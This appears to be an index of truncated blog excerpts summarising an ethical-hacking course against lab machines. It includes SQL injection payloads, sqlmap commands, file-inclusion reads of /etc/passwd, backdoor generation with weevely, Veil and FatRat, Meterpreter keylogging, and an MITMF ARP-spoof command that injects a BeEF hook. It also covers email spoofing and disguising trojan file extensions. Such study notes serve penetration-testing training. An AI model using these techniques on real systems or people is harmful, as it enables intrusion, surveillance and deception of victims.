Hacking is gaining unauthorized access to anything. Preparation Setting up a lab and installing needed applications and operating systesm. Basics about computers and linux systems. Network Pentesting Test the security of networks and computers cnnect…

Ethical Hacking Tutorials Free Ethical Hacking Tutorials https://www.guru99.com/ethical-hacking-tutorials.html Types of Hackers Ethical Hacker (White hat) Cracker (Black hat) Grey hat Script kiddies Hacktivist Phreaker https://www.guru99.com/what-is-…

What is Hacking? Gaining unauthorized access. Hackers? 1.Black-hat Hackers 2.White-hat Hackers 3.Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem.…

Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specific resources. Result: They work on any OS with a python interpreter. If packaged, they will work on any OS if even if python is NOT installed.…

OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to use. It can also be used for manual testing. This is the welcome page. Options Page Scan Policy Setting Page. Attack this target URL http://10.0.0.24…

XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/Stored XSS 2.…

SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be bypassed. Use whitelist? Same issue. -> Use parameterized statements, separate data from SQL code. <?php //$textbox1 = admin' union select # Select * fr…

SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…

SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column. Using “union select 1,2,3,4,…

SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(usernames, passwords ..etc.) Web application reads, updates and inserts data in the database. Interaction with DB done using SQL. WHY ARE THEY SO DANGEROUS…

VULNS MITIGATION 1. File Upload Vulns - Only allow safe files to be updated. 2. Code Execution Vulns: Don't use dangerous functions. Filter use input before execution. 3. File inclusion: Disable allow_url_fopen & allow_url_include. Use static file in…

REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ANY server. Execute PHP files from other servers on the current server. Store PHP files on other servers as .txt. Pre-Condition: Set allow_url_include…

LOCAL FILE INCLUSION Allows an attacker to read ANY file on the same server. Access files outside www directory. Try to read  /etc/passwd file. 1. We know the current file path from the following error. 2. Try to visit following URL: http://10.0.0.24…

CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be used to get a reverse shell. Or upload any file using wget command. Code execution commands attached in the resources. The following examples assums the…

EXPLOITATION -File Upload VULNS Simple type of vulnerabilities. Allow users to upload executable files such as PHP. Upload a PHP shell or backdoor, ex:weevly 1. Generate backdoor weevly generage [password] [file name] 2. Upload the generated file. 3.…

INFORMATION GATHERING IP address. Domain name Info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois Lookup - Find info about the owner of the target. () -> http://whois.domaintools…

How to hack a website? An application installed on a computer. ->web application pen-testing A computer uses an OS + Other applications -> server-side attacks. Managed by humans -> client-side attacks Target: metastable VM…

PIVOTING Use the hacked device as a pivot. Try to gain access to other devices in the network. Tool: Metasploit - AUTOROUTE Module Target: Metasploitable VM Set up a route between hacker and hacked device. Gives hacker access to devices on the networ…

Spying - Capturing Key Strikes & Taking Screen Shots Log all mouse/keyboard events > keyscan-start - show current working directory > keyscan-dump - lists files in the current working directory. > keyscan_stop changes working directory to [lo…

MAINTAINING ACCESS - Methods 1. Using a veil-evasion Rev_http_service Rev_tcp_service Use it instead of a normal backdoor. Or upload and execute from meterpreter. Does not always work. 2. Using persistence module run persistence -h Detectable by anti…

METERPRETER BASICS >help - shows help >background - backgrounds current session >sessions -I - lists all sessions >session -i - interact with a certain session >sysinfo - displays system info. >ipconfig - displays info about interfaces.…

CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the properties of the file. The file type of a trojan is application(.exe) , even if it looks like jpg\PDF or other files. Is it what it seems to be? Check Net…

CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000…

CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL. DNS spoof requests to a page containing the hook. Inject the hook in brows…

CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract targets. (e.g. Maltego, Google ... etc.) Send an email pretending to be a friend. Online Tool: https://anonymousemail.me/ Ask them to open a link, downl…

CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a suitable one. Make the trojan even more trustable. We will use an old trick using the "right to left overload" character. 1. Open up the character…

Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable Metasploit backdoors. Uses a different method to evade AV programs. Generates executable binary backdoors for: Windows Mac OS Linux Android Install a…

CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to…

CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backdoor is a file that gives us full control over the machine that it gets executed on. Backdoors can be caught by Anti-Virus programs. Veil is a framewor…

CLIENT SIDE ATTACKS - Social Engineering Social Engineering Information gathering Tool: Maltego Gathering Information About Target's Facebook Account, Twitter Account(Friends, Followers...), Email, Phone Number, etc.…